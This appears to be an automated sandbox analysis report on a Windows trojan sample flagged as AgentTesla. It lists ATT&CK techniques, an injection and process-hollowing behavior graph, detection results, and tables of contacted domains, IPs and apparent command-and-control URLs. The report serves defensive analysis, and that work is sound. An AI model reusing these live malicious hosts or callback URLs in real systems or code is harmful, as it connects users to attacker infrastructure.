                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
                Process Injection                		NTDS41
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture13
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1479545 Sample: xU0wdBC6XWRZ6UY.exe Startdate: 23/07/2024 Architecture: WINDOWS Score: 100 31 www.thepeacedealers.com 2->31 33 www.resmierabaru20.shop 2->33 35 20 other IPs or domains 2->35 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 9 other signatures 2->49 11 xU0wdBC6XWRZ6UY.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\xU0wdBC6XWRZ6UY.exe.log, ASCII 11->29 dropped 61 Tries to detect virtualization through RDTSC time measurements 11->61 63 Injects a PE file into a foreign processes 11->63 65 Switches to a custom stack to bypass stack traces 11->65 15 xU0wdBC6XWRZ6UY.exe 11->15         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 2 other signatures 15->73 18 explorer.exe 62 1 15->18 injected process9 dnsIp10 37 ext-sq.squarespace.com 198.185.159.144, 53903, 80 SQUARESPACEUS United States 18->37 39 resmierabaru20.shop 172.96.187.60, 53902, 80 SINGLEHOP-LLCUS Canada 18->39 41 4 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 cmmon32.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 59 Switches to a custom stack to bypass stack traces 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                xU0wdBC6XWRZ6UY.exe74%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                xU0wdBC6XWRZ6UY.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                https://excel.office.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://word.office.com0%URL Reputationsafe
                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                https://outlook.com0%URL Reputationsafe
                https://android.notify.windows.com/iOS0%URL Reputationsafe
                http://schemas.micro0%URL Reputationsafe
                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                http://www.ellipsive.com/ps15/0%Avira URL Cloudsafe
                http://www.resmierabaru20.shopReferer:0%Avira URL Cloudsafe
                https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world0%Avira URL Cloudsafe
                http://www.33pgaaa.com/ps15/?XtutFHLx=aPdMTWONMgqLFXL6I6D84LbJUFKzfvQKs5jv7ieivWkC5Cuuwn9riAtDpT7vHb1zFty4mtmWJQ==&_jATs=UfdXThPpQ4ST00%Avira URL Cloudsafe
                https://api.msn.com:443/v1/news/Feed/Windows?t0%Avira URL Cloudsafe
                http://www.gmgex1.com/ps15/www.passrmale.com0%Avira URL Cloudsafe
                http://www.thepeacedealers.com/ps15/0%Avira URL Cloudsafe
                https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-0%Avira URL Cloudsafe
                https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter0%Avira URL Cloudsafe
                http://www.trezorsuite.net0%Avira URL Cloudsafe
                http://www.gomenasorry.com/ps15/0%Avira URL Cloudsafe
                http://www.thepeacedealers.com0%Avira URL Cloudsafe
                https://wns.windows.com/0%Avira URL Cloudsafe
                http://www.ellipsive.com/ps15/www.mayson-wedding.com0%Avira URL Cloudsafe
                http://www.gomenasorry.com/ps15/www.briefout.cloud0%Avira URL Cloudsafe
                https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc0%Avira URL Cloudsafe
                http://www.kaidifeiniroo.netReferer:0%Avira URL Cloudsafe
                http://www.resmierabaru20.shop/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q==0%Avira URL Cloudsafe
                http://www.plasoi.xyz/ps15/www.stdaev.com0%Avira URL Cloudsafe
                http://www.fashiontrendshub.xyzReferer:0%Avira URL Cloudsafe
                http://www.gmgex1.com0%Avira URL Cloudsafe
                http://www.resmierabaru20.shop/ps15/0%Avira URL Cloudsafe
                http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
                http://www.trezorsuite.net/ps15/www.gomenasorry.com0%Avira URL Cloudsafe
                http://www.seraphmovement.com/ps15/0%Avira URL Cloudsafe
                http://www.passrmale.com/ps15/0%Avira URL Cloudsafe
                http://www.gmgex1.com/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=EF4JIPGNIcmyDue7LvVl2/edyrLqyOOWiNy0SIrLdOiQ87GLGj4j/HRcN2lkEgVcoy4RKpdq7w==0%Avira URL Cloudsafe
                http://www.resmierabaru20.shop0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark0%Avira URL Cloudsafe
                http://www.thepeacedealers.com/ps15/www.casinomaxnodepositbonus.icu0%Avira URL Cloudsafe
                http://www.casinomaxnodepositbonus.icu/ps15/www.33pgaaa.com0%Avira URL Cloudsafe
                http://www.seraphmovement.com/ps15/www.fashiontrendshub.xyz0%Avira URL Cloudsafe
                http://www.passrmale.com0%Avira URL Cloudsafe
                http://www.33pgaaa.com/ps15/0%Avira URL Cloudsafe
                https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%Avira URL Cloudsafe
                http://www.casinomaxnodepositbonus.icu0%Avira URL Cloudsafe
                https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%Avira URL Cloudsafe
                http://www.mayson-wedding.com/ps15/?XtutFHLx=Jp/OLPjQh1lJnocY9w89QXitnE8TmDemwLH3w+grDpijucgoNCx/lT69JUoPCmCPyF9CRMydNg==&_jATs=UfdXThPpQ4ST00%Avira URL Cloudsafe
                http://www.stdaev.com/ps15/www.seraphmovement.com0%Avira URL Cloudsafe
                http://www.mayson-wedding.com/ps15/0%Avira URL Cloudsafe
                https://api.msn.com/v1/news/Feed/Windows?0%Avira URL Cloudsafe
                http://www.gomenasorry.com0%Avira URL Cloudsafe
                http://www.ellipsive.com0%Avira URL Cloudsafe
                http://www.briefout.cloudReferer:0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%Avira URL Cloudsafe
                https://www.pollensense.com/0%Avira URL Cloudsafe
                http://www.mayson-wedding.com0%Avira URL Cloudsafe
                http://www.33pgaaa.comReferer:0%Avira URL Cloudsafe
                http://www.kaidifeiniroo.net/ps15/www.plasoi.xyz0%Avira URL Cloudsafe
                https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi0%Avira URL Cloudsafe
                http://www.briefout.cloud/ps15/www.kaidifeiniroo.net0%Avira URL Cloudsafe
                http://www.fashiontrendshub.xyz0%Avira URL Cloudsafe
                https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b0%Avira URL Cloudsafe
                https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt0%Avira URL Cloudsafe
                http://www.seraphmovement.com0%Avira URL Cloudsafe
                http://www.kaidifeiniroo.net/ps15/0%Avira URL Cloudsafe
                https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-0%Avira URL Cloudsafe
                http://www.33pgaaa.com0%Avira URL Cloudsafe
                http://www.plasoi.xyzReferer:0%Avira URL Cloudsafe
                https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it0%Avira URL Cloudsafe
                http://www.kaidifeiniroo.net/ps15/?XtutFHLx=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKU7hL9ObtDz64d8cw==&_jATs=UfdXThPpQ4ST00%Avira URL Cloudsafe
                http://www.gomenasorry.comReferer:0%Avira URL Cloudsafe
                http://www.plasoi.xyz0%Avira URL Cloudsafe
                http://www.casinomaxnodepositbonus.icuReferer:0%Avira URL Cloudsafe
                http://www.briefout.cloud0%Avira URL Cloudsafe
                http://www.passrmale.comReferer:0%Avira URL Cloudsafe
                http://www.gmgex1.comReferer:0%Avira URL Cloudsafe
                https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm0%Avira URL Cloudsafe
                http://www.thepeacedealers.comReferer:0%Avira URL Cloudsafe
                http://www.ellipsive.com/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=Kye4QYwCGZ93CUuJ7G3wCxFSkbsRF7hlwXf/oBbqQT4B5phfVvGGkKkS6yRwXurkmoW1rD9KnQ==0%Avira URL Cloudsafe
                http://www.thepeacedealers.com/ps15/?XtutFHLx=+OvncPmxK4E3ovTf4IdVLliDjSzyCopJXOwX4tpaGEeHBcqDgavndBw1dSHqFFxWSSZSfTMm+g==&_jATs=UfdXThPpQ4ST00%Avira URL Cloudsafe
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%Avira URL Cloudsafe
                http://www.passrmale.com/ps15/www.trezorsuite.net0%Avira URL Cloudsafe
                http://www.casinomaxnodepositbonus.icu/ps15/0%Avira URL Cloudsafe
                https://powerpoint.office.com0%Avira URL Cloudsafe
                http://www.briefout.cloud/ps15/0%Avira URL Cloudsafe
                http://www.foreca.com0%Avira URL Cloudsafe
                http://www.resmierabaru20.shop/ps15/www.thepeacedealers.com0%Avira URL Cloudsafe
                http://www.trezorsuite.netReferer:0%Avira URL Cloudsafe
                http://www.33pgaaa.com/ps15/www.ellipsive.com0%Avira URL Cloudsafe
                http://www.trezorsuite.net/ps15/0%Avira URL Cloudsafe
                http://www.gmgex1.com/ps15/0%Avira URL Cloudsafe
                http://www.stdaev.comReferer:0%Avira URL Cloudsafe
                http://www.plasoi.xyz/ps15/0%Avira URL Cloudsafe
                http://www.mayson-wedding.com/ps15/www.gmgex1.com0%Avira URL Cloudsafe
                http://www.ellipsive.comReferer:0%Avira URL Cloudsafe
                http://www.seraphmovement.comReferer:0%Avira URL Cloudsafe
                http://www.kaidifeiniroo.net0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                ss-k2-ss-k2.sspeeddns.com
                		154.86.16.125
                		truefalse
                  		unknown
                  gomenasorry.com
                  		184.154.46.218
                  		truetrue
                    		unknown
                    website-rendering.jouwweb.nl
                    		35.204.150.5
                    		truefalse
                      		unknown
                      ext-sq.squarespace.com
                      		198.185.159.144
                      		truetrue
                        		unknown
                        shops.myshopify.com
                        		23.227.38.74
                        		truefalse
                          		unknown
                          briefout.cloud
                          		103.56.204.76
                          		truetrue
                            		unknown
                            resmierabaru20.shop
                            		172.96.187.60
                            		truetrue
                              		unknown
                              www.gmgex1.com
                              		1.32.249.49
                              		truefalse
                                		unknown
                                www.trezorsuite.net
                                		172.67.214.13
                                		truefalse
                                  		unknown
                                  www.resmierabaru20.shop
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.33pgaaa.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.casinomaxnodepositbonus.icu
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.mayson-wedding.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.kaidifeiniroo.net
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.passrmale.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.briefout.cloud
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.thepeacedealers.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.ellipsive.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.gomenasorry.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.33pgaaa.com/ps15/?XtutFHLx=aPdMTWONMgqLFXL6I6D84LbJUFKzfvQKs5jv7ieivWkC5Cuuwn9riAtDpT7vHb1zFty4mtmWJQ==&_jATs=UfdXThPpQ4ST0false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.resmierabaru20.shop/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gmgex1.com/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=EF4JIPGNIcmyDue7LvVl2/edyrLqyOOWiNy0SIrLdOiQ87GLGj4j/HRcN2lkEgVcoy4RKpdq7w==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.mayson-wedding.com/ps15/?XtutFHLx=Jp/OLPjQh1lJnocY9w89QXitnE8TmDemwLH3w+grDpijucgoNCx/lT69JUoPCmCPyF9CRMydNg==&_jATs=UfdXThPpQ4ST0false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.kaidifeiniroo.net/ps15/?XtutFHLx=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKU7hL9ObtDz64d8cw==&_jATs=UfdXThPpQ4ST0false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ellipsive.com/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=Kye4QYwCGZ93CUuJ7G3wCxFSkbsRF7hlwXf/oBbqQT4B5phfVvGGkKkS6yRwXurkmoW1rD9KnQ==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.thepeacedealers.com/ps15/?XtutFHLx=+OvncPmxK4E3ovTf4IdVLliDjSzyCopJXOwX4tpaGEeHBcqDgavndBw1dSHqFFxWSSZSfTMm+g==&_jATs=UfdXThPpQ4ST0true
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 0000000C.00000002.3737130665.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.resmierabaru20.shopReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winterexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.thepeacedealers.com/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://excel.office.comexplorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.trezorsuite.netexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gmgex1.com/ps15/www.passrmale.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ellipsive.com/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gomenasorry.com/ps15/www.briefout.cloudexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gomenasorry.com/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ellipsive.com/ps15/www.mayson-wedding.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.thepeacedealers.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&ocexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.kaidifeiniroo.netReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://wns.windows.com/explorer.exe, 0000000C.00000000.1312007503.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fashiontrendshub.xyzReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexU0wdBC6XWRZ6UY.exe, 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.plasoi.xyz/ps15/www.stdaev.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.resmierabaru20.shop/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gmgex1.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000C.00000000.1315888639.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2275065911.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271546398.000000000C3FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077197592.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748567632.000000000C428000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2274367081.000000000C41F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
